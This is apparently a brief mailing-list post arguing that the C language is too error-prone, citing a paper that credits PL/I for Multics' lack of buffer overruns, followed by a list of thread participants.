IMHO, the problem is that the C language is just too error prone to be used for most software. In "Thirty Years Later: Lessons from the Multics Security Evaluation", Paul A. Karger and Roger R. Schell <www.acsac.org/2002/papers/classic-multics.pdf> credit the use of PL/I for the lack of buffer overruns in Multics. However, in the Unix/Linux/PC/Mac world, a successor language has not yet appeared.
participants (10)
-
Amir Herzberg
-
Anne & Lynn Wheeler
-
Bill Frantz
-
Dave Howe
-
James A. Donald
-
John S. Denker
-
Matt Crawford
-
Sean Smith
-
Sunder
-
Tim Dierks